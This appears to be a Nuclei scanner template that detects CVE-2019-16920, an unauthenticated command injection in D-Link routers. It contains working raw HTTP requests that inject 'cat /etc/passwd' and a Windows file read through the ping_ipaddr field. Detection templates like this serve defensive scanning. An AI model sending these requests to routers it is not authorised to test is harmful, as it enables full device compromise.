id: CVE-2019-16920 info: name: Unauthenticated Multiple D-Link Routers RCE author: dwisiswant0 severity: critical description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r tags: cve,cve2019,dlink,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2019-16920 cwe-id: CWE-78 requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}} html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body - type: status status: - 200